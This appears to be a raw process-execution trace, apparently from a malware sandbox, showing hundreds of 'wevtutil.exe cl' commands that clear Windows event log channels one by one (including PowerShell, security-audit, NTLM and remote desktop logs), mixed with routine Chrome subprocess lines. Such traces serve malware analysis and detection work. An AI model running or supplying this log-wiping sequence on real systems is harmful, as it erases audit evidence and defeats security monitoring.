wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3020 /prefetch:2

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2780 /prefetch:1

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3612 /prefetch:8

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Disk/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Documents/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EFS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HAL/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Help/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IKE/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-International/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MCT/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3744 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3712 /prefetch:8

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3728 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3748 /prefetch:8

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RPC/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Sens/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"

